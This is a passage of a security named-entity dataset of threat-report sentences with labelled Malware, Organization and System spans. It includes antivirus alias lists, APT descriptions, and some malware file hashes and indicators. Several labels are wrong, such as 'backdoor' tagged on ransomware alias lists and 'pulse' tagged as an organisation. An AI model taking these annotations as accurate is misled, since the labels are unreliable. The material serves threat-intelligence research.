Win32/Trojan.Ransom.0d9", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000570", "source": "cyner2_valid"}} {"text": "A good example is provided by Turla's watering hole campaigns.", "spans": {}, "info": {"id": "cyner2_valid_000571", "source": "cyner2_valid"}} {"text": "Of the various binaries downloaded , the most interesting are null , which serves as a local and reverse shell , and rootdaemon , which takes care of privilege escalation and data acquisition .", "spans": {}, "info": {"id": "cyner2_valid_000572", "source": "cyner2_valid"}} {"text": "The Trojan allows the criminals to remotely control the victim ’ s computer and is capable of recording sound from a microphone .", "spans": {}, "info": {"id": "cyner2_valid_000573", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.ElaxanD.Trojan Packed.Win32.TDSS!O Worm.Kufgal.13650 Backdoor/Wuca.lt 
Win32.Trojan.WisdomEyes.16070401.9500.9997 Win32/Kufgal.AD WORM_KUFGAL.SMA Trojan.Win32.Wuca.bszqq Packer.W32.Tibs.l4Hz Win32.Backdoor.Wuca.cvxl Trojan.Copyself.112 Backdoor.Wuca.Win32.1016 WORM_KUFGAL.SMA Backdoor.Win32.Wuca Backdoor/Wuca.gs Backdoor.Win32.S.Wuca.8864 Worm:Win32/Kufgal.A Trojan/Win32.MalPack.C155329 W32/Wuca.OD!tr Backdoor.Wuca Win32/Trojan.34d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000574", "source": "cyner2_valid"}} {"text": "File Name Modified Date SHA256 null_arm 2018-02-27 06:44:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 null_i686 2018-02-27 06:44:00 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 null_arm64 2018-02-27 06:43:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 sepolicy-inject_arm 2019-01-08 04:55:00 47449a612697ad99a6fbd6e02a84e957557371151f2b034a411ebb10496648c8 sepolicy-inject_arm64 2019-01-08 04:55:00 824ad333320cbb7873dc49e61c14f749b0e0d88723635524463f2e6f56ea133a sepolicy-inject_i686 2019-01-08 04:55:00 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6 rootdaemon_arm 2019-01-08 04:55:00 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 rootdaemon_arm64 2019-01-08 04:55:00 3ee3a973c62ba5bd9eab595a7c94b7a26827c5fa5b21964d511ab58903929ec5 mike.jar 2018-12-06 05:50:00 a42a05bf9b412cd84ea92b166d790e8e72f1d01764f93b05ace62237fbabe40e rootdaemon_i686 2019-01-08 04:55:00 b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 zygotedaemonarm 2019-01-08 04:55:00 e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f zygotedaemonarm64 2019-01-08 04:55:00 11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59 zygotedaemoni686 2019-01-08 04:55:00 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33 sapp.apk 2019-01-08 04:53:00 4bf1446c412dd5c552539490d03e999a6ceb96ae60a9e7846427612bec316619 placeholder 2018-03-29 16:31:00 
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 After download , Exodus One would dynamically load and execute the primary stage 2 payload mike.jar using the Android API DexClassLoader ( ) .", "spans": {"Malware: Exodus One": [[1545, 1555]], "System: Android API": [[1638, 1649]]}, "info": {"id": "cyner2_valid_000575", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Script Ransom_Ysakrypt.R011C0DKP17 Trojan.Encoder.7240 Ransom_Ysakrypt.R011C0DKP17 BehavesLike.Win32.Downloader.gc TR/RedCap.rludy Trojan.Autoit Trj/CI.A Win32/Trojan.Script.ed4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000576", "source": "cyner2_valid"}} {"text": "One single domain easy-trading.biz is relaying all traffic to other ad networks' and ultimately to the Nuclear exploit kit.", "spans": {"Malware: Nuclear exploit kit.": [[103, 123]]}, "info": {"id": "cyner2_valid_000577", "source": "cyner2_valid"}} {"text": "Allows an application to collect battery statistics Allows an app to access precise location .", "spans": {}, "info": {"id": "cyner2_valid_000578", "source": "cyner2_valid"}} {"text": "From April 2016 and at least until February 2017, attackers have been spreading malware via fake Facebook profiles and pages, breached websites, self-hosted and cloud based websites.", "spans": {"Malware: spreading malware": [[70, 87]]}, "info": {"id": "cyner2_valid_000580", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32/FlyStudio.NVR W32/DLoader.AHYXT WORM_FLYSTUD.SMA Worm.FlyStudio-38 not-a-virus:AdWare.Win32.FlyStudio.h TrojWare.Win32.TrojanDownloader.Small.AA WORM_FLYSTUD.SMA Virus.Win32.Heur.c Trojan.Win32.FlyStudio.uk HeurEngine.MaliciousPacker Trj/FlyStudio.BQ", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000581", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/Kryptik.cynw Win32.Trojan.WisdomEyes.16070401.9500.9949 Trojan.Win32.Bebloh.dnrhin 
Trojan.Win32.Z.Kryptik.541696.B TrojWare.Win32.Spy.Zbot.VAU Trojan.PWS.Panda.2401 TR/ZbotCitadel.A.907 Trojan/Win32.Buzus Trojan:Win32/Zapis.A Trojan.Graftor.D2ACEB Trojan/Win32.MDA.R134684 Trojan.Buzus Trojan.Buzus!H8PndnQYTT0 Trojan.Win32.Crypt W32/Kryptik.CYVK!tr Win32/Trojan.97a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000582", "source": "cyner2_valid"}} {"text": "The attackers, whom we have named Packrat, have shown a keen and systematic interest in the political opposition and the independent press in so-called ALBA countries Bolivarian Alternative for the Americas, and their recently allied regimes.", "spans": {"Organization: political opposition": [[92, 112]], "Organization: the independent press": [[117, 138]]}, "info": {"id": "cyner2_valid_000583", "source": "cyner2_valid"}} {"text": "PoisonIvy, a Remote Access Tool/Trojan RAT often used in targeted attacks, had been widely seen until around 2013.", "spans": {"Malware: PoisonIvy,": [[0, 10]], "Malware: Remote Access Tool/Trojan RAT": [[13, 42]]}, "info": {"id": "cyner2_valid_000585", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Worm.AutoRun.S6542 RiskWare.GameHack Trojan.Delf.Win32.76215 Trojan/Delf.tkh Trojan.Symmi.DECD2 Win32.Backdoor.Yobdam.a Trojan.Win32.Delf Win32/Trojan.2c8", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000587", "source": "cyner2_valid"}} {"text": "This pulse contain IOC's related to phishing campaigns using the technique described above.", "spans": {"Organization: pulse": [[5, 10]]}, "info": {"id": "cyner2_valid_000588", "source": "cyner2_valid"}} {"text": "We surmise that the bad guys attempted to gain further access within the victim's network.", "spans": {"System: the victim's network.": [[69, 90]]}, "info": {"id": "cyner2_valid_000590", "source": "cyner2_valid"}} {"text": "WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private 
intelligence report Skipper Turla – the White Atlas framework from mid-2016.", "spans": {"Malware: project": [[24, 31]]}, "info": {"id": "cyner2_valid_000591", "source": "cyner2_valid"}} {"text": "Considering the other malicious behaviors of XLoader , this added operation could be very dangerous as threat actors can use it to perform targeted attacks .", "spans": {"Malware: XLoader": [[45, 52]]}, "info": {"id": "cyner2_valid_000592", "source": "cyner2_valid"}} {"text": "] it Firenze server2mi.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner2_valid_000594", "source": "cyner2_valid"}} {"text": "This botnet borrows partial code such as port scanning module from the Mirai, but it is completely different from mirai in terms of infect chain, C2 communication protocol, attack module and so on.", "spans": {"Malware: botnet": [[5, 11]], "Malware: code": [[28, 32]], "Malware: the Mirai,": [[67, 77]], "Malware: mirai": [[114, 119]]}, "info": {"id": "cyner2_valid_000595", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Exploit.MSIL.CVE-2013-0074.fb Exploit:MSIL/CVE-2013-0074.A Exploit.MSIL.CVE-2013-0074.fb W32/CVE_2013_0074.K!tr Win32/Trojan.Exploit.233", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000597", "source": "cyner2_valid"}} {"text": "The note synthesizes information found in publicly leaked materials, as well as our own research.", "spans": {}, "info": {"id": "cyner2_valid_000598", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Email.FakeDoc PE:Malware.FakeDOC@CV!1.9C3C PossibleThreat.SB!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000599", "source": "cyner2_valid"}} {"text": "MOSA is the Palestinian Directorate of Social Development whose mandate is to achieve comprehensive development , social security , and economic growth for Palestinian families , according to publicly available information on this ministry .", 
"spans": {"Organization: MOSA": [[0, 4]]}, "info": {"id": "cyner2_valid_000600", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Dropper.RYB Trojan.Dropper.RYB TROJ_BLAZGEL.SMT W32/Backdoor2.CFRK Backdoor.Trojan TROJ_BLAZGEL.SMT Trojan.Dropper.RYB Trojan.Win32.Scar.mve Trojan.Dropper.RYB Trojan.Dropper.RYB Trojan.Dropper.RYB BackDoor.Hbeat.70 BehavesLike.Win32.PWSZbot.ch Trojan-GameThief.Win32.OnLineGames Win32.Troj.PcClientT.gb.kcloud Backdoor:Win32/Blazgel.A Troj.Dropper.W32.Delf.lbZp Trojan.Win32.Scar.mve Trojan/Win32.Malco.R7516 Trojan.Dropper.RYB Trojan.Scar Win32.Trojan.Scar.Lnyd W32/Dropper.RTE!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000603", "source": "cyner2_valid"}} {"text": "Also our visibility as a vendor does not cover every company in the world at least so far ; and the Kaspersky Security Network KSN did not reveal other attacks except those against gaming companies.", "spans": {"Organization: vendor": [[25, 31]], "Organization: Kaspersky Security Network": [[100, 126]], "Organization: gaming companies.": [[181, 198]]}, "info": {"id": "cyner2_valid_000604", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Bumat.28611 Adware/BetterInternet.hu TROJ_PHINIT.SM Multi.Threats.InArchive W32/Trojan2.KHEV Win.Spyware.64804-2 TrojanSpy.Adroder Trojan.PWS.Spy.16470 Trojan.Win32.Small W32/Trojan.VSKJ-6216 Trojan/Win32.Unknown TrojanDownloader:Win32/Phinit.B Trojan.Heur.RP.EDBBFC Trj/CI.A Malware_fam.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000605", "source": "cyner2_valid"}} {"text": "The mobile ransomware , detected by Microsoft Defender for Endpoint as AndroidOS/MalLocker.B , is the latest variant of a ransomware family that ’ s been in the wild for a while but has been evolving non-stop .", "spans": {"System: Microsoft Defender": [[36, 54]]}, "info": {"id": "cyner2_valid_000607", "source": "cyner2_valid"}} {"text": "This RAT, referred to as 
uWarrior because of embedded PDB strings, has been previously described by an independent researcher who noted a potentially unknown exploit being used against Microsoft Office.", "spans": {"Malware: RAT,": [[5, 9]], "Malware: uWarrior": [[25, 33]], "Organization: independent researcher": [[103, 125]], "Malware: unknown exploit": [[150, 165]], "System: Microsoft Office.": [[185, 202]]}, "info": {"id": "cyner2_valid_000609", "source": "cyner2_valid"}} {"text": "The researchers say the malware uses the unusually tight control it gains over infected devices to create windfall profits and steadily increase its numbers .", "spans": {}, "info": {"id": "cyner2_valid_000610", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.Starter.14336.C Trojan.Zenshirsh.SL7 Troj.W32.Explodus.liiL Trojan/Starter.hux TROJ_STARTER_BL1327D4.TOMC Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Starter.GM TROJ_STARTER_BL1327D4.TOMC Trojan.Win32.Starter.cmtisb Trojan.Hosts.6989 Trojan.Starter.Win32.838 Trojan.Win32.Starter Trojan/Win32.Starter Trojan:Win32/Finkmilt.B!dll Trojan/Win32.Starter.R46071 Trojan.Starter Trojan.Kazy.DAF0C Win32.Trojan.Starter.dgge Trojan.Starter!x33KpsfjiCg Win32/Trojan.1e8", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000611", "source": "cyner2_valid"}} {"text": "The command will be issued as an answer to the beaconing , and the result will be returned to the URL http : // /api/v2/set_state.php Example of the command \" changeServer '' The commands are issued in a JSON format , and the obfuscation is part of the malware code and not added by the packer .", "spans": {}, "info": {"id": "cyner2_valid_000613", "source": "cyner2_valid"}} {"text": "I have no clue on the exact targets; the website I found was a Dutch website for a hobby group not a really high-ranked target.", "spans": {}, "info": {"id": "cyner2_valid_000614", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Ecltys 
Trojan.Zusy.Elzob.D6028 BKDR_GANYMEDE.SM Win32.Trojan.WisdomEyes.16070401.9500.9961 W32/Trojan.WWZB-0176 Trojan.Ecltys BKDR_GANYMEDE.SM BehavesLike.Win32.Backdoor.ch Backdoor.Win32.Ecltys BDS/Ecltys.A.15 Backdoor:Win32/Ecltys.A Trojan/Win32.Ecltys.C253327 Win32.Trojan.Ganymede.Ecud Backdoor.Ecltys!+blycSIaf1Y W32/Ecltys.A!tr Win32/Backdoor.eeb", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000615", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32/MalwareF.AAVPK Trojan.AVKill.5434 TROJ_SPNR.0BK211 PWS:Win32/Zuler.B W32/MalwareF.AAVPK Dropper/Win32.Clons MSIL/Injector.PE!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000616", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Crypt.IP Trojan.Win32.OnLineGames.vdso W32/Backdoor2.DVZK Backdoor.Trojan Frethog.J Trojan.Crypt.IP Trojan.DR.Nepotemp!/l3wjl8GZiw Trojan.Win32.AntiAV.454656 Trojan.Crypt.IP Trojan.MulDrop4.23385 TROJ_NEPOTMP.SMT Win32/DropDown.a TrojanDropper:Win32/Nepotemp.A Dropper/Win32.OnlineGameHack Trojan.Crypt.IP W32/Backdoor.XAXT-1489 TrojanPSW.WOW Backdoor.Trojan Trojan-Dropper.Win32.Nepotemp Trj/Downloader.MDW", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000617", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9559 TROJ_PLEADLDR.ZAEH-A TROJ_PLEADLDR.ZAEH-A Trojan:Win32/Harmony.B!dha Trojan.Graftor.D5A2C5", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000618", "source": "cyner2_valid"}} {"text": "Here ’ s how it works : At first glance , the email shown in Figure 1 looks like any other phishing email that asks the user to download an invoice .", "spans": {}, "info": {"id": "cyner2_valid_000619", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.SasfisQKC.Fam.Trojan Backdoor/W32.Androm.72784 Trojan.Win32.Menti!O Trojan.Menti.Win32.1491 Trojan.Kazy.D4828 
Win32.Trojan.WisdomEyes.16070401.9500.9929 TROJ_ZKRYPT.SMIH Win.Trojan.Menti-2002 Troj.Spy.W32.Zbot.lzkr Trojan.Proxy.20008 TROJ_ZKRYPT.SMIH BehavesLike.Win32.Trojan.lc Trojan/Menti.bsb TR/Menti.72784a.3 Trojan/Win32.Menti Trojan/Win32.Menti.C64869 BScope.Trojan-Dropper.TDSS.01313 Trojan.Menti!IOdity46ghk Trojan.Win32.Rimecud", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000621", "source": "cyner2_valid"}} {"text": "We certainly weren't the only ones who saw this malware, and many others have also reported on it.", "spans": {}, "info": {"id": "cyner2_valid_000622", "source": "cyner2_valid"}} {"text": "As mentioned above , banking Trojans are perhaps the most complex of all mobile threats , and Svpeng is one of the most striking examples .", "spans": {"Malware: Svpeng": [[94, 100]]}, "info": {"id": "cyner2_valid_000624", "source": "cyner2_valid"}} {"text": "We hope that this blog post helps other researchers to understand and analyze FinFisher samples and that this industry-wide information-sharing translate to the protection of as many customers as possible .", "spans": {"Malware: FinFisher": [[78, 87]]}, "info": {"id": "cyner2_valid_000625", "source": "cyner2_valid"}} {"text": "Today, a coordinated coalition involving AlienVault and several other security companies led by Novetta is announcing Operation BlockBuster.", "spans": {"Organization: AlienVault": [[41, 51]], "Organization: security companies": [[70, 88]], "Organization: Novetta": [[96, 103]]}, "info": {"id": "cyner2_valid_000626", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.TazokeDAT.Trojan Ransom/W32.Crypren.535040 Ransom.Gibon.S1626077 Ransom.Gibon Ransom_Nobig.R002C0DKE17 Ransom.CryptXXX Ransom_Nobig.R002C0DKE17 Win32.Trojan-Ransom.Gibon.A Trojan.Win32.Mlw.euswlf Trojan.Win32.Z.Crypren.535040 Trojan.Encoder.15110 Trojan.Crypren.Win32.549 BehavesLike.Win32.Virut.hh Trojan.Win32.Filecoder Trojan.Crypren.kd TR/Crypren.iqwad Trojan.Ransom.Gibon.5 
Trojan/Win32.Crypren.R212092 Trojan.Ransom.Gibon Trojan-Ransom.Crypren Trj/GdSda.A W32/Filecoder_Gibon.A!tr Win32/Trojan.ab6", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000628", "source": "cyner2_valid"}} {"text": "'' \" According to our statistics , as of today , there 're more than 500 , 000 Android devices infected by this bootkit in China in last six months .", "spans": {"System: Android": [[79, 86]]}, "info": {"id": "cyner2_valid_000629", "source": "cyner2_valid"}} {"text": "A backdoor also known as: PSW.QQPass.13965 TSPY_QQPASS.SMIB Win32.Trojan.Pebox.l W32/Dropper.AMTL Trojan.Dropper Win32/Gamepass.XN TSPY_QQPASS.SMIB Win.Trojan.Magania-11938 BehavesLike.Win32.PWSZbot.vc W32/Risk.FVMX-1597 Trojan[GameThief]/Win32.Magania TrojanDropper:Win32/Nemqe.B Trojan/Win32.OnlineGameHack.R7674 TScope.Malware-Cryptor.SB Trojan.DR.Darsing.A Virus.Win32.Rootkit Trj/Dropper.JSF Win32/Virus.236", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000630", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TrojanDropper.Dogrobot.G4 Trojan/Dalixi.c Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Dropper Win32/Dogrobot.WH Rootkit.Win32.AntiAv.pem Trojan.TenThief.DNFTrojan.bbxd TrojWare.Win32.KillAV.MN Trojan.DownLoader5.43567 BehavesLike.Win32.Dropper.nc Trojan.Kazy.D1A92 Rootkit.Win32.AntiAv.pem TrojanDropper:Win32/Dogrobot.G Dropper/Win32.Mudrop.R5283 Rootkit.AntiAv", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000631", "source": "cyner2_valid"}} {"text": "It is possible thanks to the modular design of this malware – it consists of the main binary the one user downloads and infects with, which later downloads several additional modules from the C2 server – they modify code by overwriting some of the called functions with their own.", "spans": {}, "info": {"id": "cyner2_valid_000632", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Mauvaise.SL1 
TROJ_INJECTOR_GE08008A.UVPM Trojan.Win32.Inject.aeyfy Trojan.Win32.Inject.eogwxj Troj.W32.Inject!c Win32.Trojan.Inject.Ajvg Trojan.Inject.Win32.237018 TROJ_INJECTOR_GE08008A.UVPM W32/Trojan.ALUY-5414 W32.Adware.Installcore TR/Crypt.ZPACK.vbjap Trojan.Zusy.D39918 Trojan.Win32.Z.Zusy.376832.JH Trojan.Win32.Inject.aeyfy TrojanDownloader:Win32/Nitedrem.F!bit Trojan/Win32.MDA.C1930371 Trojan.Inject Trojan.Inject!cIMjgJ170GI Trojan.Win32.Injector", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000633", "source": "cyner2_valid"}} {"text": "The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to", "spans": {"Organization: the Russian Federation": [[121, 143]]}, "info": {"id": "cyner2_valid_000634", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-PWS/W32.Mesgra.712704 Trojan.Mesgra.Win32.1 Trojan/Mesgra.a W32/Trojan.BMYL Trojan.Win32.FlyStudio.zmcq BehavesLike.Win32.Downloader.jc W32/Trojan.JNKV-8773 TR/PSW.Mesgra.dcjkp PWS:Win32/Mesgra.A Trojan.Strictor.D557F Trojan.Win32.PSWMesgra.712704 Win32.Adware.FlyStudio.N Trojan.FlyStudio MemScanTrojan.Flystudio.B Trj/Mesgra.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000636", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9977 W32/VBTrojan.Dropper.4!Maximus Win.Trojan.StartPage-43 Trojan.Win32.StartPage.emcdkj Trojan.Win32.Z.Startpage.81920 BehavesLike.Win32.VBObfus.mm W32/VBTrojan.Dropper.4!Maximus VBS/StartPage.BG Win32.Troj.Alipay.lx.kcloud Trojan.Heur.RX.E7A72D Trojan:VBS/Startpage.AY Trj/GdSda.A Script/Virus.b54", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000637", "source": "cyner2_valid"}} {"text": "This quest to determine the currently running application is a hallmark of overlay malware , so we thought we ’ d take a closer look at how it ’ s done .", 
"spans": {}, "info": {"id": "cyner2_valid_000639", "source": "cyner2_valid"}} {"text": "Iron Tiger is an advanced persistent threat APT group that has been focused primarily on cyberespionage for more than a decade.", "spans": {}, "info": {"id": "cyner2_valid_000640", "source": "cyner2_valid"}} {"text": "The class “ org.starsizew.Ma ” is registered to intercept incoming SMS messages , the arrival of which will trigger the Android system to call its “ onReceive ” API .", "spans": {"System: Android": [[120, 127]]}, "info": {"id": "cyner2_valid_000641", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Win32.RemoteManipulator.iiq Trojan.Script.RMS.enpelx BackDoor.RMS.82 BehavesLike.Win32.AdwareLinkury.rc Backdoor.Win32.RemoteManipulator.iiq Win32/Trojan.a50", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000642", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Webus.D WORM_MEDBOT.AI Trojan.Win32.Dedler.fkxr Worm.Win32.Robobot._0 Trojan.Proxy.157 WORM_MEDBOT.AI Win32.Hack.Robobot.a.kcloud Backdoor:Win32/Robobot.A Trojan.Webus", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000643", "source": "cyner2_valid"}} {"text": "Criminals started distributing Linux.MulDrop.14 in the second half of May.", "spans": {}, "info": {"id": "cyner2_valid_000644", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Worm.Filunork.A5 Trojan.Ransom.FO WS.Reputation.1 Trojan.MulDrop4.37988 Trojan/PornoBlocker.cwn Worm:Win32/Filunork.A BScope.Trojan-Downloader.Obfuscated Trojan.FakeFolder!4EF8 Worm.Win32.Filunork W32/Filunork.AB!tr Worm.Win32.Filunork.adI", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000645", "source": "cyner2_valid"}} {"text": "The specific apps can be found in the target list in the appendix .", "spans": {}, "info": {"id": "cyner2_valid_000646", "source": "cyner2_valid"}} {"text": "A backdoor also 
known as: Win32.Trojan.WisdomEyes.16070401.9500.9995 Trojan.Win32.Clicker.bdbxsa Trojan.Click2.104 Trojan.Symmi.669", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000647", "source": "cyner2_valid"}} {"text": "This blog details the evolution of this malware family, which was first witnessed in December 2015, as well as provides various indicators of compromise IOCs that can be used by the security community.", "spans": {"Malware: malware family,": [[40, 55]], "Organization: the security community.": [[178, 201]]}, "info": {"id": "cyner2_valid_000648", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.HfsAutoB.8DE4 Packer.Malware.NSAnti.1 Trojan-GameThief.Win32.Magania!O Packer.Malware.NSAnti.1 TSPY_MAGANIA.AKD Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/PWStealer.OFV Trojan.Packed.NsAnti TSPY_MAGANIA.AKD Packer.Malware.NSAnti.1 Trojan-GameThief.Win32.Magania.dsg Packer.Malware.NSAnti.1 Trojan.Win32.NSAnti.fthc Troj.PSW32.W.OnLineGames.kYJw Packer.Malware.NSAnti.1 Packer.Malware.NSAnti.1 Trojan.MulDrop.31693 Trojan.Win32.4CD56CB8 BehavesLike.Win32.PWSGamania.cc Trojan-GameThief.Win32.Magania W32/PWStealer.OFV Packer.Malware.NSAnti.1 Trojan-GameThief.Win32.Magania.dsg Trojan/Win32.Magania.R31316 Malware-Cryptor.Win32.NSAnti Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000649", "source": "cyner2_valid"}} {"text": "Quaverse RAT or QRAT is a fairly new Remote Access Tool RAT introduced in May 2015.", "spans": {"Malware: Quaverse RAT": [[0, 12]], "Malware: QRAT": [[16, 20]], "Malware: Remote Access Tool RAT": [[37, 59]]}, "info": {"id": "cyner2_valid_000650", "source": "cyner2_valid"}} {"text": "One thing is certain, it's not a new threat.", "spans": {}, "info": {"id": "cyner2_valid_000653", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.A.Downloader.93184 Trojan.DownLoad1.45438 BehavesLike.Win32.Virut.nm TrojanDownloader:Win32/Netins.A Trj/StartPage.DGJ", 
"spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000654", "source": "cyner2_valid"}} {"text": "We needed to do this to understand the techniques FinFisher uses to compromise and persist on a machine , and to validate the effectiveness of Office 365 ATP detonation sandbox , Windows Defender Advanced Threat Protection ( Windows Defender ATP ) generic detections , and other Microsoft security solutions .", "spans": {"Malware: FinFisher": [[50, 59]], "System: Office 365 ATP": [[143, 157]], "System: Windows Defender Advanced Threat Protection": [[179, 222]], "System: Windows Defender ATP": [[225, 245]], "Organization: Microsoft": [[279, 288]]}, "info": {"id": "cyner2_valid_000655", "source": "cyner2_valid"}} {"text": "Both versions still appear to be active.", "spans": {}, "info": {"id": "cyner2_valid_000656", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Worm.Autorun.bm Trojan.Win32.NaKocTb.errzoc BehavesLike.Win32.Adware.gt Trojan.Miner.hs Trojan:Win32/Bomner.A!bit Trojan/Win32.Zurgop.C2007044", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000657", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9911 Ransom:MSIL/Rasoon.A Trj/RnkBend.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000658", "source": "cyner2_valid"}} {"text": "The first variant is a “ first stage application , ” that performs basic profiling of a device , and under certain conditions attempts to download and install a much more comprehensive surveillanceware component , which is the second variant .", "spans": {}, "info": {"id": "cyner2_valid_000660", "source": "cyner2_valid"}} {"text": "The most significant change in this particular Trojan ’ s history was the encryption of data sent between the device and C & C .", "spans": {}, "info": {"id": "cyner2_valid_000661", "source": "cyner2_valid"}} {"text": "Office 365 Advanced Threat Protection secures 
mailboxes from email campaigns that use zero-day exploits to deliver threats like FinFisher .", "spans": {"System: Office 365 Advanced Threat Protection": [[0, 37]], "Vulnerability: zero-day exploits": [[86, 103]], "Malware: FinFisher": [[128, 137]]}, "info": {"id": "cyner2_valid_000662", "source": "cyner2_valid"}} {"text": "Mirai is known for the ease with which it can victimize IoT devices.", "spans": {"Malware: Mirai": [[0, 5]], "System: IoT devices.": [[56, 68]]}, "info": {"id": "cyner2_valid_000663", "source": "cyner2_valid"}} {"text": "The value of the first item , whose key is “ method ” ( line 7 ) , indicates the type of the contents : install , info and sms .", "spans": {}, "info": {"id": "cyner2_valid_000664", "source": "cyner2_valid"}} {"text": "In mid-January of 2017 Unit 42 researchers became aware of reports of open-source developers receiving malicious emails.", "spans": {"Organization: Unit 42 researchers": [[23, 42]], "Organization: open-source developers": [[70, 92]]}, "info": {"id": "cyner2_valid_000665", "source": "cyner2_valid"}} {"text": "Zen does n't even check for the root privilege : it just assumes it has it .", "spans": {"Malware: Zen": [[0, 3]]}, "info": {"id": "cyner2_valid_000666", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TROJ_HPUTOTI.SM4 Win32.Trojan.WisdomEyes.16070401.9500.9809 Trojan-PSW.Win32.Fareit.bona Troj.Psw.W32.Fareit!c Trojan.PWS.Steam.15269 W32/Trojan.COEA-5117 DR/Autoit.royix PWS:Win32/Stimilini.K Trojan-PSW.Win32.Fareit.bona Trojan/Win32.HDC.C437658 TrojanDropper.Injector Trj/CI.A Win32/Injector.Autoit.CEM Win32.Trojan-qqpass.Qqrob.Alio W32/Autoit.CEM!tr Win32/Trojan.Dropper.a18", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000667", "source": "cyner2_valid"}} {"text": "Online video streaming sites have always been some of the most visited destinations on the web.", "spans": {}, "info": {"id": "cyner2_valid_000668", "source": "cyner2_valid"}} {"text": "A backdoor also 
